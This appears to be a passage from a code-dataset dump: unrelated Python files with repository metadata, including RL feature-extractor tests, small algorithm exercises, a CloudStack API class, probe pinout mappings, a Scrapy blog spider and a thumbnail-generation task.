        )

    def test_extract_max_q_parametric_action(self):
        self._test_extract_max_q_parametric_action(normalize=False)

    def test_extract_max_q_parametric_action_normalize(self):
        self._test_extract_max_q_parametric_action(normalize=True)

    def _test_extract_max_q_parametric_action(self, normalize):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            action_normalization_parameters=self.get_action_normalization_parameters(),
            max_q_learning=True,
            normalize=normalize,
        )
        # Setup
        ws, net = self.create_ws_and_net(extractor)
        input_record = self.create_extra_input_record(net)
        self.setup_state_features(ws, input_record.state_features)
        self.setup_next_state_features(ws, input_record.next_state_features)
        self.setup_action_features(ws, input_record.action)
        possible_next_actions = self.setup_possible_next_actions_features(
            ws, input_record.possible_next_actions
        )
        reward = self.setup_reward(ws, input_record.reward)
        extra_data = self.setup_extra_data(ws, input_record)
        # Run
        ws.run(net)
        res = extractor.extract(ws, input_record, net.output_record())
        o = res.training_input
        npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
        npt.assert_array_equal(
            extra_data.action_probability.reshape(-1, 1),
            res.extras.action_probability.numpy(),
        )
        npt.assert_allclose(
            self.expected_action_features(normalize),
            o.action.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_array_equal(
            possible_next_actions[0], o.possible_next_actions.lengths.numpy()
        )
        npt.assert_allclose(
            self.expected_possible_next_actions_features(normalize),
            o.possible_next_actions.actions.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_state_features(normalize),
            o.state.float_features.numpy(),
            rtol=1e-6,
        )
        # Next state is tiled once per possible next action in max-Q mode.
        npt.assert_allclose(
            self.expected_tiled_next_state_features(normalize),
            o.tiled_next_state.float_features.numpy(),
            rtol=1e-6,
        )

    def test_extract_sarsa_parametric_action(self):
        self._test_extract_sarsa_parametric_action(normalize=False)

    def test_extract_sarsa_parametric_action_normalize(self):
        self._test_extract_sarsa_parametric_action(normalize=True)

    def _test_extract_sarsa_parametric_action(self, normalize):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            action_normalization_parameters=self.get_action_normalization_parameters(),
            max_q_learning=False,
            normalize=normalize,
        )
        # Setup
        ws, net = self.create_ws_and_net(extractor)
        input_record = self.create_extra_input_record(net)
        self.setup_state_features(ws, input_record.state_features)
        self.setup_next_state_features(ws, input_record.next_state_features)
        self.setup_action_features(ws, input_record.action)
        self.setup_next_action_features(ws, input_record.next_action)
        reward = self.setup_reward(ws, input_record.reward)
        extra_data = self.setup_extra_data(ws, input_record)
        # Run
        ws.run(net)
        res = extractor.extract(ws, input_record, net.output_record())
        o = res.training_input
        npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
        npt.assert_array_equal(
            extra_data.action_probability.reshape(-1, 1),
            res.extras.action_probability.numpy(),
        )
        npt.assert_allclose(
            self.expected_action_features(normalize),
            o.action.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_next_action_features(normalize),
            o.next_action.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_state_features(normalize),
            o.state.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_next_state_features(normalize),
            o.next_state.float_features.numpy(),
            rtol=1e-6,
        )

    def test_create_net_max_q_discrete_action(self):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            max_q_learning=True,
        )
        expected_input_record = schema.Struct(
            ("state_features", map_schema()),
            ("next_state_features", map_schema()),
            ("action", schema.Scalar()),
            ("possible_next_actions", schema.List(schema.Scalar())),
        )
        expected_output_record = schema.Struct(
            ("state", schema.Scalar()),
            ("next_state", schema.Scalar()),
            ("action", schema.Scalar()),
            ("possible_next_actions", schema.List(schema.Scalar())),
        )
        self.check_create_net_spec(
            extractor, expected_input_record, expected_output_record
        )

    def test_create_net_sarsa_discrete_action(self):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            max_q_learning=False,
        )
        expected_input_record = schema.Struct(
            ("state_features", map_schema()),
            ("next_state_features", map_schema()),
            ("action", schema.Scalar()),
            ("next_action", schema.Scalar()),
        )
        expected_output_record = schema.Struct(
            ("state", schema.Scalar()),
            ("next_state", schema.Scalar()),
            ("action", schema.Scalar()),
            ("next_action", schema.Scalar()),
        )
        self.check_create_net_spec(
            extractor, expected_input_record, expected_output_record
        )

    def test_create_net_max_q_parametric_action(self):
        self._test_create_net_max_q_parametric_action(normalize=False)

    def test_create_net_max_q_parametric_action_normalize(self):
        self._test_create_net_max_q_parametric_action(normalize=True)

    def _test_create_net_max_q_parametric_action(self, normalize):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            action_normalization_parameters=self.get_action_normalization_parameters(),
            max_q_learning=True,
            normalize=normalize,
        )
        expected_input_record = schema.Struct(
            ("state_features", map_schema()),
            ("next_state_features", map_schema()),
            ("action", map_schema()),
            ("possible_next_actions", schema.List(map_schema())),
        )
        expected_output_record = schema.Struct(
            ("state", schema.Scalar()),
            ("tiled_next_state", schema.Scalar()),
            ("action", schema.Scalar()),
            ("possible_next_actions", schema.List(schema.Scalar())),
        )
        self.check_create_net_spec(
            extractor, expected_input_record, expected_output_record
        )

    def test_create_net_sarsa_parametric_action(self):
        self._test_create_net_sarsa_parametric_action(normalize=False)

    def test_create_net_sarsa_parametric_action_normalize(self):
        self._test_create_net_sarsa_parametric_action(normalize=True)

    def _test_create_net_sarsa_parametric_action(self, normalize):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            action_normalization_parameters=self.get_action_normalization_parameters(),
            max_q_learning=False,
            normalize=normalize,
        )
        expected_input_record = schema.Struct(
            ("state_features", map_schema()),
            ("next_state_features", map_schema()),
            ("action", map_schema()),
            ("next_action", map_schema()),
        )
        expected_output_record = schema.Struct(
            ("state", schema.Scalar()),
            ("next_state", schema.Scalar()),
            ("action", schema.Scalar()),
            ("next_action", schema.Scalar()),
        )
        self.check_create_net_spec(
            extractor, expected_input_record, expected_output_record
        )
class TestPredictorFeatureExtractor(FeatureExtractorTestBase):
    """Tests for PredictorFeatureExtractor: dense extraction and net-spec
    creation, with and without normalization.

    In the fixtures below, the expected outputs read features [1, 3, 2, 4]
    as state features and [12, 11, 13] as action features; keys 9 and 14
    are fed but never appear in any expected dense output.
    """
    def setup_float_features(self, ws, field):
        # Three examples holding 5, 4 and 7 key/value pairs respectively;
        # lengths sum to the 16 entries in `keys`/`values`.
        lengths = np.array([3 + 2, 0 + 4, 5 + 2], dtype=np.int32)
        keys = np.array(
            [2, 11, 12, 1, 14, 11, 12, 13, 9, 1, 13, 12, 2, 3, 4, 5], dtype=np.int64
        )
        values = np.array(
            [0, 20, 21, 1, 22, 23, 24, 25, 2, 3, 26, 27, 4, 5, 6, 7], dtype=np.float32
        )
        # values = np.arange(8).astype(np.float32)
        ws.feed_blob(str(field.lengths()), lengths)
        ws.feed_blob(str(field.keys()), keys)
        ws.feed_blob(str(field.values()), values)
        return lengths, keys, values
    def expected_state_features(self, normalize):
        # Feature order: 1, 3, 2, 4
        # Row 2 is all-missing: example 2 carries no state-feature keys.
        dense = np.array(
            [
                [1, MISSING_VALUE, 0, MISSING_VALUE],
                [MISSING_VALUE, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
                [3, 5, 4, 6],
            ],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
            )
        return dense
    def expected_action_features(self, normalize):
        # Feature order: 12, 11, 13
        dense = np.array(
            [[21, 20, MISSING_VALUE], [24, 23, 25], [27, MISSING_VALUE, 26]],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [12, 11, 13], self.get_action_normalization_parameters()
            )
        return dense
    def test_extract_no_action(self):
        self._test_extract_no_action(normalize=False)
    def test_extract_no_action_normalize(self):
        self._test_extract_no_action(normalize=True)
    def _test_extract_no_action(self, normalize):
        # State-only extraction: only state.float_features is produced.
        extractor = PredictorFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            normalize=normalize,
        )
        # Setup
        ws, net = self.create_ws_and_net(extractor)
        input_record = net.input_record()
        self.setup_float_features(ws, input_record.float_features)
        # Run
        ws.run(net)
        res = extractor.extract(ws, input_record, net.output_record())
        npt.assert_allclose(
            self.expected_state_features(normalize),
            res.state.float_features.numpy(),
            rtol=1e-6,
        )
    def test_extract_parametric_action(self):
        self._test_extract_parametric_action(normalize=False)
    def test_extract_parametric_action_normalize(self):
        self._test_extract_parametric_action(normalize=True)
    def _test_extract_parametric_action(self, normalize):
        # State + action extraction from the same sparse map input.
        extractor = PredictorFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            action_normalization_parameters=self.get_action_normalization_parameters(),
            normalize=normalize,
        )
        # Setup
        ws, net = self.create_ws_and_net(extractor)
        input_record = net.input_record()
        self.setup_float_features(ws, input_record.float_features)
        # Run
        ws.run(net)
        res = extractor.extract(ws, input_record, net.output_record())
        npt.assert_allclose(
            self.expected_action_features(normalize),
            res.action.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_state_features(normalize),
            res.state.float_features.numpy(),
            rtol=1e-6,
        )
    def test_create_net_sarsa_no_action(self):
        self._test_create_net_sarsa_no_action(normalize=False)
    def test_create_net_sarsa_no_action_normalize(self):
        self._test_create_net_sarsa_no_action(normalize=True)
    def _test_create_net_sarsa_no_action(self, normalize):
        # Predictor nets take a single float_features map and emit state only.
        extractor = PredictorFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            normalize=normalize,
        )
        expected_input_record = schema.Struct(("float_features", map_schema()))
        expected_output_record = schema.Struct(("state", schema.Scalar()))
        self.check_create_net_spec(
            extractor, expected_input_record, expected_output_record
        )
    def test_create_net_parametric_action(self):
        self._test_create_net_parametric_action(normalize=False)
    def test_create_net_parametric_action_normalize(self):
        self._test_create_net_parametric_action(normalize=True)
    def _test_create_net_parametric_action(self, normalize):
        # With action normalization parameters, the output grows an
        # action scalar next to the state scalar.
        extractor = PredictorFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            action_normalization_parameters=self.get_action_normalization_parameters(),
            normalize=normalize,
        )
        expected_input_record = schema.Struct(("float_features", map_schema()))
        expected_output_record = schema.Struct(
            ("state", schema.Scalar()), ("action", schema.Scalar())
        )
        self.check_create_net_spec(
            extractor, expected_input_record, expected_output_record
        )
| [
"[email protected]"
] | |
043726843b64f7026111458e53c6551599ad3e12 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03328/s713805169.py | 9bf51a8dd2d62f9ce6c096b400cb84417951bd79 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | import sys
import math
import itertools
import collections
import heapq
import re
import numpy as np
from functools import reduce
# One-line stdin readers (common competitive-programming boilerplate).
rr = lambda: sys.stdin.readline().rstrip()                 # one stripped line
rs = lambda: sys.stdin.readline().split()                  # whitespace tokens
ri = lambda: int(sys.stdin.readline())                     # single int
rm = lambda: map(int, sys.stdin.readline().split())        # ints (iterator)
rl = lambda: list(map(int, sys.stdin.readline().split()))  # ints (list)
inf = float('inf')
mod = 10**9 + 7
a, b = rm()
# n = b - a; the n-th triangular number n*(n+1)//2 is the full height, and
# the answer printed is that minus b.
# NOTE(review): problem-specific arithmetic inferred from the formula only —
# verify against the original AtCoder problem statement (p03328).
c = b - a
c = c*(c+1)//2
print(c-b)
| [
"[email protected]"
] | |
f096553bf112edde9a685cccede57835e9c15dd8 | 392a35174450d1151d276481be4bb4c1ed1fc841 | /chapter-05/Q06_conversion.py | d280bd750de009a1f698bee7dc71814d7822e90f | [] | no_license | jcockbain/ctci-solutions | 8f96a87532a7581cdfc55c29c8684fcdfab77a62 | 6854e9f6c7074ae22e01c3e5f6c03f641e507cd7 | refs/heads/master | 2023-01-15T16:59:58.038900 | 2020-11-28T09:14:36 | 2020-11-28T09:14:36 | 202,898,842 | 6 | 0 | null | 2020-11-28T09:14:37 | 2019-08-17T15:33:25 | Python | UTF-8 | Python | false | false | 254 | py | import unittest
def conversion(n1, n2):
    """Return how many bits must be flipped to turn n1 into n2.

    XOR marks exactly the bit positions where the two numbers differ,
    so the answer is the population count of n1 ^ n2.
    """
    return bin(n1 ^ n2).count('1')
class Test(unittest.TestCase):
    def test_conversion(self):
        # 29 = 0b11101 and 15 = 0b01111 differ in exactly two bit positions.
        self.assertEqual(2, conversion(29, 15))
| [
"[email protected]"
] | |
d3c04239cbf82fb6c83edd7f0d839a76a25a1fb7 | c19ca6779f247572ac46c6f95327af2374135600 | /backtrack/leetcode 784 Letter Case Permutation.py | 7145ae98631ee4d97b9ba49b7d4cfe96f90f5f24 | [] | no_license | clhchtcjj/Algorithm | aae9c90d945030707791d9a98d1312e4c07705f8 | aec68ce90a9fbceaeb855efc2c83c047acbd53b5 | refs/heads/master | 2021-01-25T14:24:08.037204 | 2018-06-11T14:31:38 | 2018-06-11T14:31:38 | 123,695,313 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | __author__ = 'CLH'
'''
Given a string S, we can transform every letter individually to be lowercase or uppercase to create another string. Return a list of all possible strings we could create.
'''
class Solution(object):
    """Backtracking solution to LeetCode 784 "Letter Case Permutation".

    Every alphabetic character of S may independently be lower- or
    upper-cased; letterCasePermutation returns all reachable strings in
    depth-first order, exploring the lowercase branch first.
    """

    def __init__(self):
        self.S = []             # string currently being permuted
        self.answer = []        # partial candidate, one character per position
        self.total_answer = []  # every completed permutation

    def is_a_solution(self, k):
        # A candidate is complete once every position has been assigned.
        return k == len(self.S)

    def process_solution(self):
        self.total_answer.append(''.join(self.answer))

    def constact_candiates(self, k):
        # Candidate characters for position k: both cases for a letter
        # (lowercase first), otherwise the character unchanged.
        # Fix: uses str.lower()/str.upper() instead of ord() +/- 32,
        # which was only correct for ASCII letters.
        ch = self.S[k]
        if ch.isalpha():
            return [ch.lower(), ch.upper()]
        return [ch]

    def backtrack(self, k):
        # Depth-first expansion of positions k, k+1, ... len(S)-1.
        if self.is_a_solution(k):
            self.process_solution()
            return
        for ch in self.constact_candiates(k):
            self.answer.append(ch)
            self.backtrack(k + 1)
            self.answer.pop()
        # A dead "if k == len(self.answer): return" guard was removed:
        # after pop() the candidate length is always k - 1, never k.

    def letterCasePermutation(self, S):
        """
        :type S: str
        :rtype: List[str]
        """
        self.S = S
        # Reset per call so one Solution instance can be reused safely;
        # previously results accumulated across successive calls.
        self.answer = []
        self.total_answer = []
        self.backtrack(0)
        return self.total_answer
if __name__ == "__main__":
S = Solution()
print(S.letterCasePermutation("a1b2")) | [
"[email protected]"
] | |
56a2b628001cbc8b80e9af74b4972644b513bd67 | 81407be1385564308db7193634a2bb050b4f822e | /library/lib_study/138_mm_imghdr.py | b2e25a38bf54fb2a4859d179ee87719fc5ae4348 | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 210 | py | # imghdr模块 推测文件或字节流中的图像的类型
import imghdr
# Guess the image format of 'bass.gif' from its header bytes and print it.
print(imghdr.what('bass.gif'))
# gif
# Image types that can be recognized: https://docs.python.org/zh-cn/3/library/imghdr.html#imghdr.what
| [
"[email protected]"
] | |
ee9ade01e55751cb4ad59fad7e8007aa52bf3c2d | d5b339d5b71c2d103b186ed98167b0c9488cff09 | /marvin/cloudstackAPI/createCounter.py | a4ed8386ce48bc5d359fb2c7235ada34f89378f4 | [
"Apache-2.0"
] | permissive | maduhu/marvin | 3e5f9b6f797004bcb8ad1d16c7d9c9e26a5e63cc | 211205ae1da4e3f18f9a1763f0f8f4a16093ddb0 | refs/heads/master | 2020-12-02T17:45:35.685447 | 2017-04-03T11:32:11 | 2017-04-03T11:32:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,275 | py | """Adds metric counter"""
from baseCmd import *
from baseResponse import *
class createCounterCmd (baseCmd):
    """Request object for the asynchronous 'createCounter' API call.

    NOTE(review): `typeInfo` is a class-level dict and the assignments in
    __init__ go through `self.typeInfo[...]`, so they mutate this shared
    class attribute rather than creating a per-instance mapping — confirm
    this is intended by the marvin code generator.
    """
    typeInfo = {}
    def __init__(self):
        # marked asynchronous: the server returns a job id for this call
        self.isAsync = "true"
        """Name of the counter."""
        """Required"""
        self.name = None
        self.typeInfo['name'] = 'string'
        """Source of the counter."""
        """Required"""
        self.source = None
        self.typeInfo['source'] = 'string'
        """Value of the counter e.g. oid in case of snmp."""
        """Required"""
        self.value = None
        self.typeInfo['value'] = 'string'
        # parameters that must be supplied for the call to be valid
        self.required = ["name", "source", "value", ]
class createCounterResponse (baseResponse):
    """Response object for the 'createCounter' API call.

    NOTE(review): as in the command class, `typeInfo` is class-level and is
    mutated through `self.typeInfo[...]` in __init__.
    """
    typeInfo = {}
    def __init__(self):
        """the id of the Counter"""
        self.id = None
        self.typeInfo['id'] = 'string'
        """Name of the counter."""
        self.name = None
        self.typeInfo['name'] = 'string'
        """Source of the counter."""
        self.source = None
        self.typeInfo['source'] = 'string'
        """Value in case of snmp or other specific counters."""
        self.value = None
        self.typeInfo['value'] = 'string'
        """zone id of counter"""
        self.zoneid = None
        self.typeInfo['zoneid'] = 'string'
| [
"[email protected]"
] | |
087a67e5405e3ada78f98dc48c3379436a96b3a2 | 6ac723c541e410f737be68f0af634c738e881d74 | /probes.py | abd27d07112f5ce2f0c88bd8935838e6c005df25 | [] | no_license | cxrodgers/Adapters | d478616372ca9fbfc55a886d5b384a15b01a7b91 | da68169c4bb8d8f3c4df13205df2626635632cb8 | refs/heads/master | 2022-12-22T07:46:25.588285 | 2022-12-09T15:21:54 | 2022-12-09T15:21:54 | 4,681,174 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,830 | py | """Pinout for each probe, from channel numbers to Samtec numbers."""
from builtins import range
import Adapters
# NOTE(review): Adapters.Adapter appears to map the first channel list onto
# the second, index by index — confirm against the project's Adapters module.
## This is for Adrian's 1x8 shank array
# This one goes from "electrode #" (depth?) to "interposer PCB #"
adrian_8shank2interposer = Adapters.Adapter(
    [27, 25, 21, 20, 9],
    [41, 45, 53, 55, 52],
    )
# This one goes from interposer PCB # to Samtec numbers
# This uses the little handbuild adapter I made that is an ON1 (I think)
# superglued to a breadboard PCB and hand-wired.
# Here I will use 41-80 as Samtec numbers, with 1 in the upper left when
# looking into the next adapter (out of the probe).
# The reason to use 41-80 is because this will be used with the bottom
# connector on ON4.
interposer2samtec = Adapters.Adapter([
    33, 34, 35, 36, 37, 38, 39, 40, # first column (shank side to top side)
    41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
    49, 50, 51, #52, 53, 54, 55, # third column (shank side to top side)
    ], [
    53, 57, 58, 61, 62, 65, 73, 77,
    49, 45, 41, 80, 76, 72, 68, 63,
    64, 60, 56,
    ]
    )
# Hack the above
# The inner column of interposer doesn't have any useful sites, according
# to Adrian. And the outer column of my adapter isn't wired up fully.
# So, shift the interposer such that its inner column is floating.
# Same as above, except
interposer2samtec_shifted = Adapters.Adapter([
    #33, 34, 35, 36, 37, 38, 39, 40, # first (innermost) column (shank side to top side)
    48, 47, 46, 45, 44, 43, 42, 41, # second column (shank side to top side)
    #41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
    49, 50, 51, 52, 53, 54, 55, # third column (shank side to top side)
    ], [
    53, 57, 58, 61, 62, 65, 73, 77,
    49, 45, 41, 80, 76, 72, 68, #63,
    #64, 60, 56,
    ]
    )
## End Adrian's array
# This is the A32 connector pinout from neuronexus.
# Takes us from "Samtec numbers" to Neuronexus channel numbers.
# Samtec numbers go from 1-40, with 1 in the upper right when looking at
# the probe, or 1 in the upper left when looking at the adapter.
# NOTE(review): 'GND'/'REF'/'NC' presumably mark ground, reference and
# not-connected pins — verify against the Neuronexus A32 datasheet.
samtec2nn = Adapters.Adapter(list(range(1, 41)), [
    11, 'GND', 'GND', 32,
    9, 'REF', 'NC', 30,
    7, 'NC', 'NC', 31,
    5, 'NC', 'NC', 28,
    3, 1, 26, 29,
    2, 4, 24, 27,
    6, 13, 20, 25,
    8, 14, 19, 22,
    10, 15, 18, 23,
    12, 16, 17, 21,
    ])
# This is for the Janelia pinout
# As before, Samtec numbers go from 1-40, with 1 in the upper right when
# looking at the probe. The source doc from Tim Harris shows the back side
# of the probe, so 1 is in the upper left (as it is for the adapter).
# Top connector: Janelia channels 1-16 and 49-64.
samtec2janelia_top = Adapters.Adapter(list(range(1, 41)), [
    1, 'NC', 'NC', 64,
    2, 'NC', 'NC', 63,
    3, 'NC', 'NC', 62,
    4, 'NC', 'NC', 61,
    5, 6, 59, 60,
    7, 8, 57, 58,
    9, 10, 55, 56,
    11, 12, 53, 54,
    13, 14, 51, 52,
    15, 16, 49, 50,
    ])
# Bottom connector: Janelia channels 17-48.
samtec2janelia_bottom = Adapters.Adapter(list(range(1, 41)), [
    17, 'NC', 'NC', 48,
    18, 'NC', 'NC', 47,
    19, 'NC', 'NC', 46,
    20, 'NC', 'NC', 45,
    21, 22, 43, 44,
    23, 28, 37, 42,
    24, 32, 33, 41,
    25, 29, 36, 40,
    26, 30, 35, 39,
    27, 31, 34, 38,
    ])
# A 64-channel version with two samtecs, 1-40 on the top and 41-80 on the bottom
samtec2janelia_64ch = Adapters.Adapter(list(range(1, 81)),
[
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
]) | [
"[email protected]"
] | |
161ef121e5f50f8ab2a32b0600ab9a65c050b69b | 01b49cefcb2e1aae896a444e525c4cd09aff68be | /nyankobiyori.py | 5e84f044fb388d972b61ccd0aeeb3abbcb0436e1 | [
"MIT"
] | permissive | ikeikeikeike/scrapy-2ch-summary-spiders | 308eccbe83bfc03064ec4b7a9b3952985bf58a15 | 7142693f25025a09390377649a727cfd33d15af3 | refs/heads/master | 2020-04-01T18:04:38.319532 | 2015-01-08T08:30:16 | 2015-01-08T08:30:16 | 28,956,442 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,625 | py | # -*- coding: utf-8 -*-
import re
import itertools
from scrapy import log
from scrapy.selector import Selector
from summaries.items import SummariesItem
from thread_float_bbs import (
SequenceAppend,
ThreadFloatBbsSpider
)
class NyankobiyoriSpider(ThreadFloatBbsSpider):
    """Scrapy spider for the 2ch summary blog nyankobiyori.com.

    Follows the site's RSS feed and scrapes each article page into a
    SummariesItem: title, tags, the per-post (subject, body) contents,
    image URLs and the originating 2ch thread URL.
    """
    name = 'nyankobiyori'
    allowed_domains = ['nyankobiyori.com']
    start_urls = ['http://nyankobiyori.com/index.rdf']
    def spider_page(self, response):
        """Scrape one article page and return a title-lookup request
        carrying the assembled SummariesItem."""
        sel = Selector(response)
        image_urls = []
        # contents accumulates {subject, body} records; 'index' appears to be
        # auto-filled by SequenceAppend — see thread_float_bbs.
        contents = SequenceAppend({
            "index": int,
            "subject": '',
            "body": ''
        })
        # Main
        # NOTE(review): itertools.izip is Python 2 only — this spider
        # predates Python 3 (zip() would be the py3 equivalent).
        main = sel.css('div.body')
        generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
        for sub, body in generator:
            image_urls.extend(sub.css('img').xpath('@src').extract())
            image_urls.extend(body.css('img').xpath('@src').extract())
            contents.append({
                "subject": sub.extract(),
                "body": body.extract()
            })
        # body more
        main = sel.css('div.bodymore')
        generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
        for sub, body in generator:
            image_urls.extend(sub.css('img').xpath('@src').extract())
            image_urls.extend(body.css('img').xpath('@src').extract())
            contents.append({
                "subject": sub.extract(),
                "body": body.extract()
            })
        item = dict(
            posted=False,
            source=self.extract_source(sel),
            url=response.url,
            title=self.get_text(sel.css('h1 span')),
            tags=self.extract_tags(sel, response),
            contents=contents.result(),
            image_urls=image_urls
        )
        # set title from source.
        return self.request_title(item['source'], SummariesItem(**item))
    def extract_source(self, selector):
        """Extract the URL of the source 2ch thread; None on any failure."""
        try:
            # first span text mentioning a known BBS host
            url = [
                text for
                text in selector.css('div.bodymore span').xpath('text()').extract()
                if text.find('2ch.net') != -1
                or text.find('2ch.sc') != -1
                or text.find('www.logsoku.com') != -1
            ][0]
            return re.search(u"(?P<url>https?://[^\s][^」]+)", url).group("url").strip()
        except Exception as exc:
            # best-effort scraping: log the failure and fall back to None
            # so the item can still be built
            log.msg(
                format=("Extract source (error): "
                        "Error selector %(selector)s "
                        "url `%(url)s`: %(errormsg)s"),
                level=log.WARNING,
                spider=self,
                selector=selector,
                url=selector.response.url,
                errormsg=str(exc))
            return None
    def extract_tags(self, selector, response):
        """Extract article tags (first feed category term plus on-page tag
        links); empty list on any failure."""
        try:
            feed = self.get_feed(response.url)
            tags = [
                self.get_text(tag)
                for tag in selector.css('p[class^=category_] a,p.tag a')
            ]
            # de-duplicate via set(); note this does not preserve order
            return list(set([feed['tags'][0]['term']] + tags))
        except Exception as exc:
            log.msg(
                format=("Extract tags (error): "
                        "Error selector %(selector)s "
                        "url `%(url)s`: %(errormsg)s"),
                level=log.WARNING,
                spider=self,
                selector=selector,
                url=response.url,
                errormsg=str(exc))
            return []
| [
"[email protected]"
] | |
1e23e7a0136d045d6b3707215f193b71e0e7ee8c | 62420e35e497f3026a980f1ab6dd07756eeeae7f | /oparlsync/generate_thumbnails/GenerateThumbnails.py | 804a53c257d97dd0ebb4f2b689dcd0deabb6991d | [] | no_license | curiousleo/daemon | b530f528449579ecbb0bd52dee94cbc954bd9b96 | d47a5b49ac144b9992ab35ff09f113a94f16bd60 | refs/heads/master | 2020-04-14T01:56:52.316211 | 2018-12-30T09:20:18 | 2018-12-30T09:42:53 | 163,573,533 | 0 | 0 | null | 2018-12-30T08:38:41 | 2018-12-30T08:38:41 | null | UTF-8 | Python | false | false | 9,206 | py | # encoding: utf-8
"""
Copyright (c) 2012 - 2016, Ernesto Ruge
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os
import shutil
import datetime
from PIL import Image
from ..base_task import BaseTask
from ..models import Body, File
from minio.error import ResponseError, NoSuchKey
from pymongo.errors import CursorNotFound
class GenerateThumbnails(BaseTask):
    """Render per-page JPEG thumbnails for every un-processed File of a Body.

    For each File without a thumbnailStatus the task downloads the payload,
    converts .doc files to PDF (abiword), rasterizes every page to PNG
    (ghostscript), scales each page to the configured thumbnail heights,
    optimizes and uploads the JPEGs to S3, and stores per-page metadata
    (width/height/filesize) on the File document.
    """
    name = 'GenerateThumbnails'
    # backend services this task needs (interpreted by BaseTask)
    services = [
        'mongodb',
        's3'
    ]

    def __init__(self, body_id):
        self.body_id = body_id
        super().__init__()
        # per-run outcome counters
        self.statistics = {
            'wrong-mimetype': 0,
            'file-missing': 0,
            'successful': 0
        }

    def run(self, body_id, *args):
        """Process all pending files of the given body.

        The queryset is iterated manually so that an expired server-side
        MongoDB cursor can be re-opened and iteration resumed.
        """
        if not self.config.ENABLE_PROCESSING:
            return
        self.body = Body.objects(uid=body_id).no_cache().first()
        if not self.body:
            return
        files = File.objects(thumbnailStatus__exists=False, body=self.body.id).no_cache().all()
        while True:
            try:
                file = next(files)
